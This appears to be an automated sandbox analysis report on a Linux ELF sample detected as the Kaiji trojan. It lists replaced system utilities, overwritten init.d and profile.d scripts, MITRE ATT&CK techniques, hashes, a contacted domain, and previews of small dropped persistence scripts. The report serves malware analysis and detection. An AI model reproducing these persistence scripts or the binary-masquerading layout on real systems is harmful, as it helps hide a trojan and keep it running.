Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/32676 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /boot/System.mod (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/lib/libgdi.so.0.8.1 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/lib/system-mark (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/include/ps (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/include/ss (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/include/ls (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/include/dir (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/include/netstat (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/include/find (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/include/lsof (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/ps (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/ss (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/ls (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/dir (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/netstat (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/find (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /usr/bin/lsof (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/32676	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /.mod	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apport	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cron	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/procps	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/saned	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/udev	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-common	Jump to dropped file

Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Shell script file created: /etc/profile.d/bash_cfg.sh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Shell script file created: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Shell script file created: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Shell script file created: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Shell script file created: /etc/profile.d/gateway.sh	Jump to dropped file

Source: /usr/sbin/service (PID: 5569)	Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p			Jump to behavior
Source: /usr/sbin/service (PID: 5653)	Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/apport	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/cron	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/cups	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/procps	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/saned	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/udev	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/init.d/x11-common	Jump to dropped file

Source: /etc/32676 (PID: 5564)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior
Source: /etc/32676 (PID: 5748)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior
Source: /etc/32676 (PID: 5809)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior

Source: /usr/bin/sleep (PID: 5564)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/bin/sleep (PID: 5748)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/bin/sleep (PID: 5809)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5665)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5704)	Sleeps longer then 60s: 60.0s	Jump to behavior

Source: /tmp/utZX7JAuMU.elf (PID: 5537)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5551)	Queries kernel information via 'uname':	Jump to behavior
Source: /etc/32676 (PID: 5557)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5570)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5598)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5606)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5685)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5763)	Queries kernel information via 'uname':	Jump to behavior

Source: open-vm-tools.14.dr	Binary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1
Source: utZX7JAuMU.elf, 5537.1.0000555783edf000.00005557843a6000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/aarch64
Source: open-vm-tools.14.dr	Binary or memory string: if ! ${checktool} \| grep -iq vmware; then
Source: open-vm-tools.14.dr	Binary or memory string: rm -f /var/run/vmtoolsd.pid
Source: utZX7JAuMU.elf, 5537.1.0000555783edf000.00005557843a6000.rw-.sdmp	Binary or memory string: WUrg.qemu.gdb.arm.sys.regs">
Source: open-vm-tools.14.dr	Binary or memory string: checktool='vmware-checkvm'
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid \|\| exit 2
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: utZX7JAuMU.elf, 5537.1.0000555783edf000.00005557843a6000.rw-.sdmp	Binary or memory string: rg.qemu.gdb.arm.sys.regs">
Source: utZX7JAuMU.elf, 5537.1.0000555783edf000.00005557843a6000.rw-.sdmp	Binary or memory string: WU1/etc/qemu-binfmt/aarch64O
Source: utZX7JAuMU.elf, 5537.1.00007ffc464f0000.00007ffc46511000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-aarch64/tmp/utZX7JAuMU.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/utZX7JAuMU.elf
Source: open-vm-tools.14.dr	Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 \|\| exit $?
Source: utZX7JAuMU.elf, 5537.1.00007ffc464f0000.00007ffc46511000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-aarch64

Stealing of Sensitive Information

Yara detected Kaiji

Source: Yara match

File source: utZX7JAuMU.elf, type: SAMPLE

Remote Access Functionality

Yara detected Kaiji

Source: Yara match

File source: utZX7JAuMU.elf, type: SAMPLE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hide Artifacts	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
utZX7JAuMU.elf	21%	ReversingLabs	Linux.Trojan.Kaiji
utZX7JAuMU.elf	25%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
/.mod	0%	ReversingLabs
/etc/32676	0%	ReversingLabs
/etc/init.d/acpid	0%	ReversingLabs
/etc/init.d/alsa-utils	0%	ReversingLabs
/etc/init.d/anacron	0%	ReversingLabs
/etc/init.d/apparmor	0%	ReversingLabs
/etc/init.d/avahi-daemon	0%	ReversingLabs
/etc/init.d/binfmt-support	0%	ReversingLabs
/etc/init.d/bluetooth	0%	ReversingLabs
/etc/init.d/console-setup.sh	0%	ReversingLabs
/etc/init.d/cron	0%	ReversingLabs
/etc/init.d/cryptdisks	0%	ReversingLabs
/etc/init.d/cryptdisks-early	0%	ReversingLabs
/etc/init.d/cups	0%	ReversingLabs
/etc/init.d/cups-browsed	0%	ReversingLabs
/etc/init.d/dbus	0%	ReversingLabs
/etc/init.d/gdm3	0%	ReversingLabs
/etc/init.d/hddtemp	0%	ReversingLabs
/etc/init.d/hwclock.sh	0%	ReversingLabs
/etc/init.d/irqbalance	0%	ReversingLabs
/etc/init.d/iscsid	0%	ReversingLabs
/etc/init.d/keyboard-setup.sh	0%	ReversingLabs
/etc/init.d/kmod	0%	ReversingLabs
/etc/init.d/lightdm	0%	ReversingLabs
/etc/init.d/lm-sensors	0%	ReversingLabs
/etc/init.d/lvm2-lvmpolld	0%	ReversingLabs
/etc/init.d/mono-xsp4	0%	ReversingLabs
/etc/init.d/multipath-tools	0%	ReversingLabs
/etc/init.d/open-iscsi	0%	ReversingLabs
/etc/init.d/open-vm-tools	0%	ReversingLabs
/etc/init.d/plymouth	0%	ReversingLabs
/etc/init.d/plymouth-log	0%	ReversingLabs
/etc/init.d/procps	0%	ReversingLabs
/etc/init.d/rsync	0%	ReversingLabs
/etc/init.d/rsyslog	0%	ReversingLabs
/etc/init.d/saned	0%	ReversingLabs
/etc/init.d/screen-cleanup	0%	ReversingLabs
/etc/init.d/spice-vdagent	0%	ReversingLabs
/etc/init.d/ssh	0%	ReversingLabs
/etc/init.d/udev	0%	ReversingLabs
/etc/init.d/ufw	0%	ReversingLabs
/etc/init.d/unattended-upgrades	0%	ReversingLabs
/etc/init.d/uuidd	0%	ReversingLabs
/etc/init.d/x11-common	0%	ReversingLabs
/etc/profile.d/bash_cfg.sh	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	216.58.206.36	true	false		unknown
ss.us-tv.top	unknown	unknown	false		unknown

World Map of Contacted IPs

⊘No contacted IP infos

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.google.com	fL4E1jNVCt.elf	Get hash	malicious	Kaiji	Browse	142.251.116.105
	Xq5coKA8BI.elf	Get hash	malicious	Kaiji	Browse	142.250.184.228
	Ww0lpzmYHO.elf	Get hash	malicious	Kaiji	Browse	142.251.116.105
	c4RvDuLtq1.elf	Get hash	malicious	Kaiji	Browse	216.58.212.132
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	142.250.186.36
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.186.100
	http://168.63.129.16:32526/vmSettings	Get hash	malicious	Unknown	Browse	142.250.185.228
	https://dareka4te.shop	Get hash	malicious	Unknown	Browse	142.250.186.132
	http://www.thexe.afatydfe.com/	Get hash	malicious	Unknown	Browse	142.250.185.132
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	142.250.186.132

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/.mod	fL4E1jNVCt.elf	Get hash	malicious	Kaiji	Browse
	Xq5coKA8BI.elf	Get hash	malicious	Kaiji	Browse
	Ww0lpzmYHO.elf	Get hash	malicious	Kaiji	Browse
	c4RvDuLtq1.elf	Get hash	malicious	Kaiji	Browse
	linux_arm5.elf	Get hash	malicious	Kaiji	Browse
	linux_aarch64.elf	Get hash	malicious	Kaiji	Browse
	linux_amd64.elf	Get hash	malicious	Kaiji	Browse
	linux_arm7.elf	Get hash	malicious	Kaiji	Browse
	linux_arm6.elf	Get hash	malicious	Kaiji	Browse
	DerI9qwTwK.elf	Get hash	malicious	Kaiji	Browse
/etc/32676	fL4E1jNVCt.elf	Get hash	malicious	Kaiji	Browse
	Xq5coKA8BI.elf	Get hash	malicious	Kaiji	Browse
	Ww0lpzmYHO.elf	Get hash	malicious	Kaiji	Browse
	c4RvDuLtq1.elf	Get hash	malicious	Kaiji	Browse
	linux_arm5.elf	Get hash	malicious	Kaiji	Browse
	linux_aarch64.elf	Get hash	malicious	Kaiji	Browse
	linux_amd64.elf	Get hash	malicious	Kaiji	Browse
	linux_arm7.elf	Get hash	malicious	Kaiji	Browse
	linux_arm6.elf	Get hash	malicious	Kaiji	Browse
	DerI9qwTwK.elf	Get hash	malicious	Kaiji	Browse

Created / dropped Files

/.mod

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.9931325576478587
Encrypted:	false
SSDEEP:	3:TKH/LQP5o:8M2
MD5:	FF0DB01AA3465358D28FD34FE8479236
SHA1:	DBE00D4EAD9F9FE3D8B97CBDCA1F2EFD5EF86EEF
SHA-256:	BF659AA5C483CF60E1E7626EEC9FAE7AE182CC611A3F42B2521F8A8C018C7195
SHA-512:	F414CE5B5A10DD25EA22CA123473604445411E056F4310DFE1C09AECE6B16CB5AD8B989070201594025A6DBE319FE87A871E63209E977EE185EF302689F048B2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fL4E1jNVCt.elf, Detection: malicious, Browse Filename: Xq5coKA8BI.elf, Detection: malicious, Browse Filename: Ww0lpzmYHO.elf, Detection: malicious, Browse Filename: c4RvDuLtq1.elf, Detection: malicious, Browse Filename: linux_arm5.elf, Detection: malicious, Browse Filename: linux_aarch64.elf, Detection: malicious, Browse Filename: linux_amd64.elf, Detection: malicious, Browse Filename: linux_arm7.elf, Detection: malicious, Browse Filename: linux_arm6.elf, Detection: malicious, Browse Filename: DerI9qwTwK.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/bash./usr/lib/libgdi.so.0.8.1

/etc/.walk

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	147
Entropy (8bit):	3.886577909649096
Encrypted:	false
SSDEEP:	3:3Rk4WtwyImmKE+B4WtwyImmKEC2TLQdHjhOdQBHXWcMn:hRtm++qtm+C2MdHjcy3Wxn
MD5:	E4F82F0D5381138D6D00A5319DB04419
SHA1:	DEA639B4FE769490C802882356E8177A83AA90BB
SHA-256:	63AFE309BF5035B8390D24676C242099689B4353D32D86BFAE2A67D9E41C869C
SHA-512:	BD7FB235990C7502064DF7D46E276EB84AF6B8360F64FA3E44A381D22FE284582DA468C7E4AD3A7AE9A2505E8A8620EAC388C6F8F8CE6742D35FAA8731F6D9C6
Malicious:	false
Reputation:	low
Preview:	e74ed74ec65f017ed1638a49c1350a23fc5dee15dc0a797a.e74ed74ec65f017ed1638a49c1350a23fc5dee15dc0a797a.e464ed5cf25f2831d065cf4dc1350d7ee85d8a5fc939277a.

/etc/32676

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.619727741986734
Encrypted:	false
SSDEEP:	3:TKH/zOsUF4K0WJTD0HXD:LsUF4kDYXD
MD5:	6CB66DDA6E7B14F42654921B3EC25226
SHA1:	B39354C512D130E1C52E9163DC12C4D5704A60A7
SHA-256:	45A2B263B893B33C703B7E5F64F04DE776D1DC9578BE65C5047195CD531FEF2A
SHA-512:	91A32A8C6B9490CB31CDB79C2E8697DAF1637C63136658B46037D60ED47D2B6D685F62D526E87960BAF93C6875295CF0C892EDAF65B34CBEB00D9961FEE7938B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fL4E1jNVCt.elf, Detection: malicious, Browse Filename: Xq5coKA8BI.elf, Detection: malicious, Browse Filename: Ww0lpzmYHO.elf, Detection: malicious, Browse Filename: c4RvDuLtq1.elf, Detection: malicious, Browse Filename: linux_arm5.elf, Detection: malicious, Browse Filename: linux_aarch64.elf, Detection: malicious, Browse Filename: linux_amd64.elf, Detection: malicious, Browse Filename: linux_arm7.elf, Detection: malicious, Browse Filename: linux_arm6.elf, Detection: malicious, Browse Filename: DerI9qwTwK.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/bash.while [ 1 ]; do.sleep 60./etc/opt.services.cfg.done

/etc/crontab

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	24
